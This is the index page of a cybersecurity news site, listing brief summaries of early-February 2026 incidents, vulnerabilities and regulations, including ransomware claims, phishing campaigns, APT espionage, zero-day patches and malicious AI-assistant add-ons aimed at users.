Site Map

Comprehensive index of all cybersecurity intelligence content and resources.

Security Articles

New '0APT' Extortion Group Fakes Data Breach in Bluff Attack on Australian Hospital

A new extortion group calling itself '0APT' has targeted Australia's Epworth HealthCare, claiming to have stolen 920GB of sensitive patient and financial data. The group listed the hospital on its darknet leak site on February 4, 2026, threatening to publish the data if a ransom was not paid. However, Epworth HealthCare conducted a thorough investigation with external cybersecurity experts and found "no verified evidence of any impact to our systems or data." Cybersecurity researchers have corroborated this, assessing that 0APT is likely a "fake" ransomware operation. The group's modus operandi involves posting a high volume of victims without providing credible proof of a breach, instead using empty files or random data streams. This tactic relies on psychological pressure and the threat of reputational damage to extort payment, representing a shift from technical intrusion to pure intimidation.

Feb 9, 20265 min read

KillSec Ransomware Group Claims Attack on Nigerian Tech Startup Getly

The ransomware group known as KillSec has claimed responsibility for a cyberattack on Getly, a Nigerian technology startup. On February 9, 2026, the group posted the claim on its platform, stating it had breached the company and exfiltrated sensitive data. KillSec has threatened to leak the stolen information if its unspecified ransom demands are not met. Getly, which operates the `getly.app` domain, has not yet publicly commented on the alleged breach, and the claims have not been independently verified. The incident highlights the global reach of ransomware gangs and the increasing risk they pose to startups and small businesses in emerging markets, not just large enterprises.

Feb 9, 20264 min read

Australia Post Phishing Scam Harvests Credit Card and OTP Data

A widespread phishing campaign is actively targeting Australians by impersonating Australia Post. Cybersecurity firm MailGuard intercepted the scam on February 9, 2026, which uses emails with the subject line "Parcel Awaiting Instructions." The emails claim a delivery has failed due to an incomplete address and trick recipients into clicking a link to pay a small, fraudulent shipping fee of 1.99 AUD. The link leads to a sophisticated, multi-stage credential harvesting site designed to look like an official Australia Post portal. The site first captures the victim's full credit card details and phone number, and then, in a final crucial step, prompts for the one-time passcode (OTP) sent to their mobile. This allows the attackers to authorize fraudulent transactions immediately. The sender's email address is a clear giveaway, and users are advised to be vigilant.

Feb 9, 20265 min read

AI Supply Chain Attack: Hundreds of Malicious 'Skills' on ClawHub Marketplace Steal Credentials

A significant software supply chain attack is targeting users of the OpenClaw AI assistant through its community marketplace, ClawHub. Security researchers have discovered hundreds of malicious 'skills'—add-ons that extend the AI's functionality—that have been published by threat actors. These skills masquerade as useful tools, such as wallet trackers or content summarizers, but their installation instructions trick users into downloading malware. The primary payloads include the Atomic Stealer infostealer for macOS and other backdoors and keyloggers for Windows. The attack leverages the trusted, open-source nature of the marketplace, which lacked a formal review process for submissions. In response to the discovery by KOI Security and SlowMist, the OpenClaw team has partnered with VirusTotal to automatically scan all skills uploaded to ClawHub to prevent further abuse.

Feb 9, 20265 min read

'Bloody Wolf' APT Deploys NetSupport RAT in Espionage Campaign

Security researchers have uncovered an active spear-phishing campaign attributed to the threat actor 'Bloody Wolf' (also tracked as Stan Ghouls). The campaign targets organizations primarily in Uzbekistan and Russia, with a focus on manufacturing, finance, and IT sectors, though government and other entities have also been targeted. The attackers use phishing emails with password-protected ZIP archives containing a malicious LNK file. When executed, this file downloads and installs the legitimate remote administration tool, NetSupport RAT, which gives the attackers full control over the victim's system. The motives appear to be mixed, pointing towards both financially motivated cybercrime and state-aligned cyber espionage. This campaign marks a shift in tooling for the group, which previously used the STRRAT malware.

Feb 9, 20265 min read

China-Linked UNC3886 Hits All Major Singapore Telcos in Coordinated Zero-Day Attack

Singaporean authorities have revealed that all four of the nation's major telecommunication providers were targeted in a sophisticated and coordinated cyber espionage campaign. The attack is attributed to UNC3886, a Chinese-linked advanced persistent threat (APT) group known for targeting critical infrastructure. The attackers exploited a zero-day vulnerability in the telcos' perimeter firewalls to gain initial access. Once inside, the group stole a limited amount of technical data and used advanced techniques to evade detection. While the attackers have not yet penetrated the core networks, officials noted their capability to deploy tools that could disrupt internet and telecommunications services. In response, Singapore has launched one of its largest-ever coordinated cyber defense operations, involving government agencies and the affected telcos working together to hunt for the intruders and harden national infrastructure.

Feb 9, 20265 min read

BeyondTrust Patches Critical 9.9 CVSS RCE Zero-Day in Remote Access Tools

BeyondTrust has patched a critical zero-day vulnerability, CVE-2026-1731, affecting its self-hosted Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw is a pre-authentication remote code execution (RCE) vulnerability with a CVSS score of 9.9, indicating extreme severity. It allows an unauthenticated attacker to execute arbitrary OS commands on a vulnerable appliance by sending a specially crafted network request, requiring no user interaction. This could lead to a full server compromise. The vulnerability affects RS versions 25.3.1 and earlier, and PRA versions 24.3.4 and earlier. BeyondTrust has already secured its cloud instances, but is urging all on-premise customers to upgrade to the patched versions immediately. The flaw was discovered and responsibly disclosed by a security researcher.

Feb 9, 20265 min read

CRITICAL: Ivanti Patches Two Actively Exploited RCE Zero-Days in EPMM

Ivanti has released urgent security patches for two critical remote code execution (RCE) vulnerabilities, CVE-2026-1281 and CVE-2026-1340, affecting its Endpoint Manager Mobile (EPMM) solution, formerly MobileIron Core. Both flaws are rated 9.8 out of 10 on the CVSS scale and are confirmed to be actively exploited in the wild as zero-days. An unauthenticated attacker can exploit these vulnerabilities to execute arbitrary code on an affected appliance, granting them access to sensitive mobile device management data. Given the active exploitation, administrators are urged to apply the temporary RPM script patches immediately while awaiting a permanent fix in the upcoming version 12.8.0.0.

Feb 9, 20265 min read

Nationwide Outage: BridgePay Payment Gateway Confirms Ransomware Attack Crippled Production Systems

U.S. payment gateway provider BridgePay Network Solutions has confirmed a ransomware attack was the cause of a massive service outage that began on February 6, 2026. The attack took down numerous production systems, including the BridgePay Gateway API, virtual terminals, and hosted payment pages, disrupting credit and debit card processing for merchants across the United States in sectors like retail, hospitality, and government. Many businesses were forced to revert to cash-only operations. BridgePay has engaged the FBI and U.S. Secret Service. While the company states that an initial investigation suggests no usable payment card data was exposed due to encryption, a timeline for full service restoration has not been provided, and the process is expected to be lengthy.

Feb 8, 20264 min read

EDR-Killer Malware Weaponizes Decade-Old EnCase Driver in BYOVD Attacks

Threat actors are using a new EDR-killing malware that leverages a 'Bring Your Own Vulnerable Driver' (BYOVD) technique to disable endpoint security products. Researchers at Huntress discovered the malware during an intrusion that began with compromised SonicWall SSL VPN credentials. The attackers abuse `EnPortv.sys`, a legitimate but long-revoked kernel driver from Guidance Software's EnCase forensic toolkit. Despite its certificate being revoked in 2010, a gap in Windows' driver signature enforcement allows it to be loaded, granting the attackers kernel-level privileges. The malware uses these privileges to terminate 59 different processes associated with major EDR vendors like CrowdStrike, SentinelOne, and Microsoft, clearing the way for ransomware deployment.

Feb 8, 20264 min read

U.S. Finalizes Ban on Chinese and Russian Tech in Connected Vehicles, Forcing Massive Supply Chain Overhaul

The United States has finalized new regulations from the Commerce Department that will ban hardware and software from China and Russia in connected vehicles sold in the U.S. The rules are designed to mitigate national security risks, preventing foreign adversaries from collecting sensitive data or manipulating vehicle functions. The ban will be phased in, starting with software for the 2027 model year and extending to hardware by 2029. The auto industry is facing what is being called 'one of the most consequential and complex auto regulations in decades,' forcing a massive and difficult overhaul of their deeply embedded global software and hardware supply chains.

Feb 8, 20264 min read

European Commission Contains Cyberattack on its Mobile Device Management (MDM) System

The European Commission disclosed on February 5, 2026, that it had identified and contained a cyberattack against its central infrastructure for managing mobile devices. The attack, detected on January 30, was reportedly contained and the system cleaned within nine hours. The Commission stated that the incident may have resulted in unauthorized access to some staff names and mobile numbers, but there is no evidence that any mobile devices themselves were compromised. The incident comes shortly after the Commission proposed a new, comprehensive cybersecurity package (CSA2) to strengthen security across the EU.

Feb 8, 20263 min read

Malicious VS Code Extension 'ClawdBot Agent' Deployed ScreenConnect RAT via Marketplace

A malicious extension named 'ClawdBot Agent' was discovered in the official Visual Studio Code Marketplace, impersonating a popular AI coding assistant to trick developers. The trojanized extension was fully functional, helping it evade suspicion while its malicious payload executed in the background upon VS Code launch. The attack chain fetched a remote configuration file that initiated the deployment of a weaponized version of the legitimate remote support tool, ConnectWise ScreenConnect, effectively turning it into a Remote Access Tool (RAT). This gave attackers full remote control over compromised developer machines. The extension was quickly removed by Microsoft, but the incident highlights the growing risk of supply chain attacks targeting developer ecosystems.

Feb 8, 20264 min read

EU Proposes Revised Cybersecurity Act to Bolster Supply Chain Security & ENISA's Role

The European Commission has introduced a new cybersecurity package that includes a proposal for a revised Cybersecurity Act (CSA) and targeted amendments to the NIS2 Directive. The initiative aims to strengthen the EU's collective resilience against cyber threats by establishing a framework for ICT supply chain security, promoting 'cyber-secure by design' principles through certification, and enhancing the role of ENISA, the EU's cybersecurity agency. The amendments to NIS2 seek to clarify rules on jurisdiction and streamline ransomware incident data collection. Once adopted, member states will have one year to transpose the new provisions into national law.

Feb 7, 20264 min read

CISA Adds Critical SmarterMail RCE Flaw to KEV Catalog Amid Active Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in SmarterTools' SmarterMail, CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which allows for unauthenticated RCE, is being actively weaponized by ransomware operators. The vulnerability stems from a missing authentication check in an API endpoint, enabling attackers to execute arbitrary commands on vulnerable email servers. CISA has directed all federal agencies to apply patches by February 26, 2026, and strongly urges all organizations using the affected software to update immediately to mitigate the significant risk of compromise.

Feb 7, 20265 min read

Transparent Tribe (APT36) Shifts Focus, Targeting Indian Startups with Crimson RAT

The Pakistan-aligned APT group Transparent Tribe (also known as APT36) has strategically shifted its targeting from Indian government and military entities to the country's growing startup sector. A new campaign, identified by researchers, uses the group's signature Crimson RAT malware delivered via malicious ISO files in phishing emails. The lures are themed around startups, with some attacks leveraging scraped personal information of real founders to appear more legitimate. The focus on startups in the cybersecurity and intelligence fields suggests the group aims to steal intellectual property and potentially use compromised companies as a supply chain vector to attack their government clients.

Feb 7, 20265 min read

Ransomware Gangs Like LockBit and BlackCat Use Legitimate ISP Software for Anonymous Server Provisioning

Researchers at Sophos have discovered how bulletproof hosting (BPH) providers are abusing legitimate server management software from ISPsystem to anonymously provision virtual machines for cybercriminals. The software, VMmanager, leaves a default hostname fingerprint (`WIN-J9D866ESIJ2`) that allowed researchers to link thousands of malicious servers to BPH providers like Stark Industries Solutions and MasterRDP. This infrastructure is actively being used to support operations for top-tier ransomware groups, including LockBit, BlackCat (ALPHV), and Conti, highlighting a critical link between legitimate tools and the cybercrime underworld.

Feb 7, 20265 min read

Aggressive Odyssey Stealer Malware Campaign Targets macOS Users Globally

A new and aggressive campaign featuring the Odyssey Stealer malware is actively targeting Apple macOS users across the globe. Initially focused on the US and Europe, the attack's reach expanded within 24 hours to South America, Africa, and Asia. Odyssey Stealer is an info-stealer designed to harvest browser credentials, crypto wallets, and system data. This latest variant uses builders to automatically generate unique, obfuscated samples, making it difficult for signature-based antivirus to detect. The malware spreads via social engineering, using fake or cracked software downloads and phishing lures to trick users into installing it.

Feb 7, 20265 min read

Attackers Abuse Windows Screensaver (.scr) Files to Drop RMM Tools for Persistent Access

A novel attack technique has been observed where threat actors are abusing Windows screensaver (.scr) files as droppers for legitimate remote monitoring and management (RMM) tools. By tricking users into executing a malicious screensaver file, attackers can bypass security controls that might block direct RMM installation. Because .scr files are executables, they can be weaponized to install the RMM software, providing the attacker with persistent, stealthy remote access to the compromised machine for data theft, surveillance, or lateral movement. This method highlights the ongoing trend of attackers using living-off-the-land techniques.

Feb 7, 20265 min read

Evolving Telegram Phishing Campaign Tricks Users into Approving Account Takeover

A sophisticated phishing campaign targeting Telegram users has re-emerged, using the platform's own features to hijack accounts. As reported by CYFIRMA, the attack tricks users with fake security alerts, directing them to a malicious site or bot that mimics an official Telegram service. The core of the attack is manipulating the user into approving a legitimate-looking authorization prompt for a 'new device' within their own Telegram app. Approving this prompt grants the attacker's device full session access, enabling them to take over the account, read private chats, and exfiltrate data. The campaign highlights the effectiveness of social engineering attacks that exploit user trust in a platform's native functions.

Feb 7, 20265 min read

Ransomware Attacks on Education Sector Slowed in 2025, But U.S. Remains Top Target

A 2025 report from Comparitech indicates a slowdown in the growth of ransomware attacks against the global education sector. There were 251 attacks recorded worldwide, a slight 2% increase from the previous year. These incidents resulted in at least 3.96 million breached records. The United States was the most affected country with 130 attacks, though this marked a 9% decrease for the nation year-over-year. High-profile incidents included demands of $400,000 against school districts by the Medusa ransomware gang, highlighting the continued financial and operational strain these attacks place on educational institutions.

Feb 7, 20265 min read

CISA: Critical SmarterMail RCE Flaw Actively Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in SmarterTools' SmarterMail, CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score of 9.3, allows an unauthenticated attacker to take full control of a mail server by abusing an API method with a missing authentication check. CISA confirms the vulnerability is being actively used in ransomware campaigns and has mandated that federal agencies patch by February 26, 2026. All organizations using the affected email server software are strongly urged to update to build 9511 or later immediately.

Feb 6, 20265 min read

CISA Issues Directive Forcing Removal of Unsupported Edge Devices from Federal Networks

In response to increasing exploitation by nation-state actors, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Binding Operational Directive (BOD) 26-02. The directive mandates that all Federal Civilian Executive Branch (FCEB) agencies inventory and remove all unsupported network edge devices, such as firewalls and routers, within one year. Devices that are end-of-life (EOL) or end-of-support (EOS) no longer receive security updates and represent a significant risk. The order requires agencies to replace unsupported hardware and software, report their inventory to CISA, and establish a mature lifecycle management process to prevent future risks from technical debt.

Feb 6, 20265 min read

Betterment Data Breach Exposes 1.4M Customers After Social Engineering Attack

Automated investment platform Betterment has disclosed a data breach affecting 1.4 million customers, originating from a sophisticated social engineering attack. Threat actors, claiming to be the 'ShinyHunters' group, used voice phishing (vishing) to manipulate employees and steal Okta single sign-on codes, gaining access to third-party marketing and support systems. The compromised data includes names, email addresses, phone numbers, and physical addresses. While core financial accounts were not compromised, the attackers used the stolen contact information to launch a fraudulent cryptocurrency scam targeting Betterment's customers. The incident highlights the growing threat of social engineering targeting employees to bypass technical security controls.

Feb 6, 20266 min read

Financial Sector Cyberattacks Doubled in 2025, Fueled by Geopolitical Hacktivism

A new report from Check Point Software reveals a dramatic escalation in cyber threats targeting the global financial sector, with incidents more than doubling in 2025. The primary driver was a 105% increase in Distributed Denial-of-Service (DDoS) attacks, which were largely motivated by geopolitically-driven hacktivism rather than direct financial gain. Hacktivist campaigns aimed to disrupt banking portals and payment systems in countries involved in geopolitical conflicts, including Israel, the U.S., and Ukraine. The report also highlights a 73% jump in data breaches and the persistent threat of multi-extortion ransomware, indicating a complex and evolving threat landscape for financial institutions.

Feb 6, 20265 min read

Critical RCE Flaw in n8n Automation Platform Allows Full Server Takeover

A critical sandbox escape vulnerability, CVE-2026-25049, has been discovered in the popular n8n workflow automation platform. The flaw, rated 9.4 on the CVSS scale, allows an authenticated user with permission to edit workflows to bypass security controls and execute arbitrary system commands on the host server. This could lead to a full server compromise, exposing sensitive credentials, API keys, and OAuth tokens stored in the environment. The vulnerability is a bypass for a previously patched RCE flaw, and administrators are urged to update to n8n versions 1.123.17 or 2.5.2 immediately to prevent potential hijacking of connected cloud services and AI pipelines.

Feb 6, 20265 min read

New 'Milkyway' Ransomware Strain Surfaces with Aggressive Extortion Tactics

A new Windows-based ransomware strain named 'Milkyway' has been identified by researchers at CYFIRMA. Currently in a developing state, the malware encrypts files and appends a '.milkyway' extension. It employs aggressive extortion tactics via a full-screen ransom note, threatening not only to leak or sell stolen data but also to report victims to tax authorities and law enforcement if the ransom is not paid. The operators also threaten to contact the victim's clients and partners. Experts warn that Milkyway could evolve into a more sophisticated threat, potentially adopting a Ransomware-as-a-Service (RaaS) model, which would significantly broaden its impact.

Feb 6, 20265 min read

Everest Ransomware Group Claims Attack on Japanese Manufacturer Hosokawa Micron

The Everest ransomware group has claimed responsibility for a cyberattack against Hosokawa Micron Corporation, a leading Japanese manufacturer of industrial processing technology. The group announced the breach on an underground forum, threatening to publish approximately 30 GB of exfiltrated confidential company data if their ransom demands are not met. This incident aligns with Everest's typical double-extortion strategy. The group is known for targeting organizations in manufacturing, finance, and IT across the U.S., Europe, and Asia, and also acts as an initial access broker, selling network access to other threat actors.

Feb 6, 20265 min read

Substack Discloses Data Breach Exposing User Contact Information

The newsletter platform Substack has announced it suffered a data breach after discovering on February 3, 2026, that an unauthorized party had gained access to a database containing user information. The exposed data includes names, email addresses, phone numbers, and Stripe IDs, though the company stated that financial data like credit card numbers and passwords were not compromised. The data exposure may date back to October 2025. With over 20 million active users, Substack is warning customers to be wary of suspicious emails and text messages, as a hacker has claimed to have stolen data from 700,000 users and posted it on the dark web.

Feb 6, 20265 min read

'Shadow Campaign' Hacks Governments in 37 Countries, China-Linked Group Suspected

Security researchers have uncovered a massive, long-running cyber-espionage operation dubbed 'Shadow Campaign.' The campaign is attributed to a suspected Chinese nation-state group, TGR-STA-1030, and has successfully compromised at least 70 government and critical infrastructure organizations in 37 countries. The group's reconnaissance activities have been even broader, targeting government infrastructure in 155 countries. Targets include high-value entities like national law enforcement, border control, finance ministries, and telecommunications companies. The operational footprint, including tools and timezone activity (GMT+8), strongly points towards a China-based actor.

Feb 5, 20265 min read

Cisco and F5 Release Urgent Patches for High-Severity DoS and RCE Vulnerabilities

Networking giants Cisco and F5 have released a wave of security updates to address multiple high-severity vulnerabilities across their product lines. Cisco patched five flaws, including a remote DoS bug in TelePresence/RoomOS (CVE-2026-20119) and a root-level command execution flaw in Meeting Management software (CVE-2026-20098). Concurrently, F5 addressed five vulnerabilities in its BIG-IP and NGINX products, two of which are rated high-severity: a DoS flaw in BIG-IP (CVE-2026-22548) and a man-in-the-middle vulnerability in NGINX (CVE-2026-1642). Customers are strongly advised to apply the patches promptly to mitigate risks of service disruption and system compromise.

Feb 5, 20264 min read

Chinese APT 'Amaranth-Dragon' Hits Southeast Asian Governments with WinRAR Exploit

A newly identified China-linked APT group, dubbed 'Amaranth-Dragon,' is conducting targeted cyber espionage campaigns against government and law enforcement agencies in Southeast Asia. The group, believed to be affiliated with the broader APT41 ecosystem, is exploiting a known WinRAR vulnerability (CVE-2025-8088) for initial access. Amaranth-Dragon demonstrates a high degree of stealth, using custom tools like 'Amaranth Loader' and a new 'TGAmaranth RAT' that leverages Telegram for command-and-control. The campaigns are tightly scoped, targeting countries like Cambodia, Thailand, and the Philippines, and appear to be motivated by geopolitical intelligence gathering.

Feb 5, 20265 min read

Voicemail-Themed Phishing Campaign Deploys Legitimate RMM Tools for Backdoor Access

A widespread social engineering campaign is using convincing voicemail-themed lures to trick victims into installing legitimate remote monitoring and management (RMM) software. The attack begins with an email, often from a bank-themed subdomain, leading to a webpage that prompts the user to 'listen to your message.' Instead of playing a message, the page guides the user through a series of installation steps for a legitimate tool called 'Remotely RMM.' Once installed, the software enrolls the device into an attacker-controlled environment, providing them with persistent remote access for data theft and further malware deployment.

Feb 5, 20264 min read

Microsoft Mandates TLS 1.2 for Azure Blob Storage, Sunsetting Older Versions

Microsoft has officially deprecated support for Transport Layer Security (TLS) versions 1.0 and 1.1 for its Azure Blob Storage service, effective February 3, 2026. TLS 1.2 is now the minimum required version for all new and existing blob storage accounts across all Azure clouds. This mandatory security enhancement aims to protect data in transit from known cryptographic vulnerabilities present in the older protocols. Customers with applications or clients still relying on TLS 1.0 or 1.1 must update them to ensure continued connectivity and avoid service disruptions.

Feb 5, 20263 min read

Futile Ransom: Nitrogen Ransomware Contains Fatal Coding Error, Decryption Impossible

In a case of profound operational failure, security researchers have discovered a fatal coding error in the Nitrogen ransomware group's malware that targets VMware ESXi systems. The flaw, found in the encryption routine, causes the malware to use the wrong public key during the encryption process. As a result, the decryptor provided by the gang after a ransom is paid is mathematically incapable of reversing the encryption. This means that any victim who pays the ransom for their encrypted ESXi virtual machines has zero chance of recovering their data, reinforcing law enforcement advice to not pay ransoms.

Feb 5, 20264 min read

UK Advances New Bill to Regulate Managed Service Providers (MSPs)

The United Kingdom government is advancing a new Cyber Security and Resilience Bill aimed at strengthening the nation's digital supply chain. A key provision of the bill is to bring Managed Service Providers (MSPs) under direct regulatory oversight for the first time. Citing the systemic risk demonstrated by attacks like the one on Synnovis that impacted the NHS, the legislation will impose security duties on MSPs similar to those already applied to essential services. The goal is to establish a higher baseline of security across the thousands of organizations that rely on MSPs for their IT and security operations.

Feb 5, 20265 min read

SolarWinds Discloses Five Critical RCE & Auth Bypass Flaws in Web Help Desk

SolarWinds has disclosed a set of five critical vulnerabilities in its Web Help Desk (WHD) platform, a tool used by over 300,000 organizations. The flaws include two unauthenticated remote code execution (RCE) vulnerabilities and two authentication bypasses, each with a CVSS score of 9.8. This incident highlights a troubling pattern of recurring patch failures, as one of the new flaws, CVE-2025-40553, is the second bypass of an original deserialization vulnerability (CVE-2024-28986) first patched in 2024. Given the critical nature of the flaws, organizations with internet-facing WHD instances are at extreme risk and must patch immediately.

Feb 5, 20265 min read

CISA Criticized for Silently Updating KEV Catalog with Ransomware Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is facing criticism for its practice of silently updating its Known Exploited Vulnerability (KEV) catalog. In 2025, the agency updated 59 entries to indicate that the flaws were being used in ransomware attacks, but it did not issue any notifications for these changes. Security experts argue that this lack of communication is a significant missed opportunity for defenders, who use the ransomware designation as a key factor in prioritizing patching.

Feb 4, 20264 min read

Massive AT&T Customer Dataset with 148M SSNs Resurfaces in Criminal Circles

A massive and highly sensitive dataset allegedly containing the personal information of AT&T customers has resurfaced and is being circulated in criminal forums. The data trove reportedly includes approximately 176 million records, featuring over 133 million full names and addresses, and, most critically, up to 148 million full and partial Social Security numbers. The re-emergence of this consolidated data poses a severe and renewed risk of identity theft, phishing, and fraud for millions of individuals.

Feb 4, 20265 min read

LinkedIn Phishing Campaign Targets Executives Using Legitimate Pen-Testing Tools

A new phishing campaign discovered by ReliaQuest is abusing LinkedIn's private messaging feature to target executives and IT professionals. The attackers use social engineering to trick victims into downloading and running a malicious archive file. The attack's novelty lies in its use of a legitimate, open-source Python script designed for penetration testing. This 'living off the land' technique makes the malicious activity difficult to distinguish from normal administrative tasks, significantly reducing the risk of detection by security software.

Feb 4, 20264 min read

Fake LINE Messenger Installer Spreads ValleyRAT Malware

A malware campaign attributed to the Silver Fox APT group is distributing the ValleyRAT remote access trojan by disguising it as an installer for the popular LINE messaging app. The campaign, which primarily targets Chinese-speaking users, uses the trojanized software as a lure to infect systems. Once installed, ValleyRAT establishes persistence and focuses on stealing user credentials, leveraging advanced evasion techniques to remain undetected.

Feb 4, 20264 min read

Critical Flaws in Django Framework Expose Sites to DoS and SQL Injection

The maintainers of the Django web framework have released important security updates to address critical vulnerabilities. The flaws could allow remote attackers to conduct Denial-of-Service (DoS) and potential SQL injection attacks against web applications built with the framework. Due to the severity of these issues, which could lead to service disruption and data compromise, administrators are strongly urged to patch their Django instances immediately.

Feb 4, 20264 min read

Critical RCE Flaw in Ingress-NGINX Threatens Kubernetes Clusters

A critical vulnerability has been discovered in the widely used Ingress-NGINX controller for Kubernetes. The flaw could allow a remote attacker to achieve arbitrary code execution within the context of the ingress controller. A successful exploit could lead to a full compromise of the ingress, enabling traffic interception, data theft, and providing a powerful foothold for lateral movement into the underlying Kubernetes cluster environment. Users are urged to patch immediately.

Feb 4, 20265 min read

Samsung's February 2026 Update Fixes 37 Flaws in Galaxy Devices

Samsung has released its February 2026 security update for its Galaxy smartphones, tablets, and foldable devices. The update addresses a total of 37 vulnerabilities. This includes 25 patches from Google for the core Android OS and 12 Samsung-specific patches (SVEs) for its One UI software. The Samsung-specific fixes address flaws rated as high and moderate severity, including an access control vulnerability in the 'Emergency Sharing' feature. Users are advised to install the update promptly.

Feb 4, 20263 min read

Google Patches Multiple Vulnerabilities in February 2026 Pixel Update

Google has released its monthly security update for all supported Pixel devices as part of its February 2026 patch cycle. The update addresses numerous security vulnerabilities detailed in the Android and Pixel-specific security bulletins. Installing the update will bring all supported Pixel devices to the 2026-02-05 patch level, ensuring they are protected against the latest discovered threats. The update also includes various functional improvements.

Feb 4, 20263 min read

UK Law Criminalizing AI-Generated Deepfake Intimate Images Takes Effect

A new law in the United Kingdom is set to come into force on February 6, 2026, making it a criminal offense to create or share AI-generated 'deepfake' intimate images of an adult without their consent. The law, part of the Data (Use and Access) Act 2025, amends the Sexual Offences Act 2003 to specifically address the malicious use of artificial intelligence to create harmful and abusive content. This legislative action is a direct response to the growing problem of non-consensual deepfake pornography.

Feb 4, 20263 min read

Notepad++ Update Mechanism Hijacked in 6-Month Supply Chain Attack by Chinese APT

The maintainers of the widely-used Notepad++ text editor have disclosed a major supply chain attack that compromised their update infrastructure for six months in 2025. The attack, attributed to the Chinese espionage group Lotus Blossom (Billbug), involved hijacking update requests to selectively deliver a custom backdoor named 'Chrysalis' and other malware like Cobalt Strike to a targeted set of organizations. Victims were primarily located in Southeast Asia and included government and financial entities, highlighting a sophisticated, long-running espionage campaign.

Feb 3, 20267 min read

Qilin Ransomware Claims Breach of Tulsa International Airport, Leaks Data

The Russian-affiliated Qilin ransomware group has claimed responsibility for a cyberattack against Tulsa International Airport. The group has listed the airport on its data leak site, alleging the theft of sensitive data including financial records and employee information. While airport operations reportedly remain unaffected, the incident highlights the ongoing trend of ransomware gangs targeting critical infrastructure. Qilin has been identified as a highly active group, responsible for a significant number of recent attacks.

Feb 3, 20265 min read

Sophisticated Phishing Attack Uses PDF Lures and Cloud Services to Steal Dropbox Credentials

A new, multi-stage phishing campaign is using procurement-themed emails with benign-looking PDF attachments to bypass email security filters. The attack chain redirects victims through a legitimate cloud service, Vercel Blob, before presenting a convincing fake Dropbox login page. The goal is to harvest corporate credentials, which are then exfiltrated to an attacker-controlled Telegram bot. This layered approach is designed to appear legitimate and evade detection by both automated systems and wary users.

Feb 3, 20265 min read

Canada Computers Discloses Data Breach Affecting Guest Checkout Customers

Canada Computers Inc., a major Canadian electronics retailer, has announced a data breach that exposed the personal and credit card information of customers. The incident affected individuals who used the 'guest' checkout feature on the company's website between December 29, 2025, and January 22, 2026. The company discovered the breach on January 22 and has since launched an investigation with law enforcement. Customers who were logged into member accounts are not believed to be affected.

Feb 3, 20265 min read

Play Ransomware Hits US Instrument Manufacturer Deatak in Data Breach

The Play ransomware group has claimed another victim in the manufacturing sector, listing U.S.-based instrument maker Deatak on its data breach forum. The attackers allege they have compromised and exfiltrated a wide range of private and confidential data, including client documents, employee payroll details, and financial information. This attack underscores the persistent threat that ransomware poses to specialized manufacturing firms, which often possess valuable intellectual property and sensitive corporate data.

Feb 3, 20265 min read

INC Ransomware Group Breaches Two U.S. Law Firms, Leaks Sensitive Client Data

The INC ransomware group is actively targeting the U.S. legal sector, claiming responsibility for attacks on at least two law firms: Hawk Law Group and Eisenberg Lowrance Lundell Lofgren. The group alleges it has stolen highly sensitive client information, including data related to civil and criminal litigation cases, government-issued IDs, and personal details. These attacks highlight the significant risk faced by law firms, which are high-value targets for cybercriminals due to the confidential nature of the data they hold.

Feb 3, 20265 min read

Ransomware Attack Cripples City of New Britain, CT, Forcing Manual Operations

A ransomware attack has caused significant and ongoing disruption to the municipal network systems of New Britain, Connecticut. The attack, which began last week and was later confirmed as ransomware, has impacted the city's entire internet server. As a result, city departments have been forced to abandon digital systems and revert to manual 'pen and paper' operations. Federal authorities have been called in to assist with the investigation and response efforts.

Feb 3, 20265 min read

FCC Warns Telecoms of 4x Increase in Ransomware, Urges Better Security

The U.S. Federal Communications Commission (FCC) has issued a formal alert to the telecommunications industry regarding the escalating threat of ransomware. Citing data that shows a fourfold increase in attacks on the sector between 2022 and 2025, the FCC's Public Safety and Homeland Security Bureau is urging providers to adopt fundamental cybersecurity best practices. The warning emphasizes that vulnerable communications networks pose a significant risk to national security and public safety, and calls for actions like patching, MFA, and network segmentation.

Feb 3, 20265 min read

Health-ISAC Report: AI-Enabled Attacks Named Top Threat to Healthcare Sector in 2026

The Health Information Sharing and Analysis Center (Health-ISAC) has released its 2026 Global Health Sector Threat Landscape report, identifying AI-enabled attacks as the number one projected concern for the year. Based on surveys of healthcare executives and security professionals, the report highlights a shift in focus towards emerging, sophisticated threats. Alongside AI, the report emphasizes the persistent dangers of major supply chain vulnerabilities and the continued high impact of ransomware. The findings, drawn from extensive data including over 1,200 targeted alerts in 2025, urge healthcare organizations to move towards a more proactive and resilient security posture.

Feb 2, 20264 min read

Open VSX Marketplace Hit by Supply Chain Attack Spreading "GlassWorm" Malware

On January 30, 2026, the Open VSX Registry, a popular marketplace for Visual Studio Code extensions, fell victim to a supply chain attack. Threat actors compromised the account of a legitimate developer, 'oorzc', and published malicious updates to four of their popular extensions. These updates embedded the 'GlassWorm' malware loader. The compromised extensions had been downloaded over 22,000 times, exposing a large number of developers to the malware before the malicious versions were removed by the Open VSX security team.

Feb 2, 20264 min read

Microsoft Patches Actively Exploited Office Zero-Day (CVE-2026-21509) Under Targeted Attack

Microsoft has released an emergency out-of-band security update for CVE-2026-21509, a high-severity security feature bypass vulnerability in Microsoft Office. The flaw, which has a CVSS score of 7.8, is being actively exploited in targeted attacks, allowing attackers to bypass Object Linking and Embedding (OLE) protections by tricking users into opening malicious documents. In response to the in-the-wild exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to apply the patch by February 16, 2026. The update applies to Office 2016, Office 2019, and Office LTSC, while Microsoft 365 Apps customers will receive a service-side update.

Feb 2, 20265 min read

New "Pulsar RAT" Evades Detection with In-Memory Execution and LoTL Techniques

Security researchers have uncovered a new, stealthy Remote Access Trojan (RAT) targeting Windows systems, named 'Pulsar RAT'. This modular, .NET-based malware utilizes a multi-stage infection chain that heavily relies on in-memory execution and living-off-the-land techniques to evade detection. It features advanced anti-analysis capabilities, including anti-VM and anti-debugging checks. Once active, Pulsar RAT provides operators with live, interactive control for credential harvesting and data exfiltration, using legitimate services like Discord and Telegram for command-and-control.

Feb 2, 20264 min read

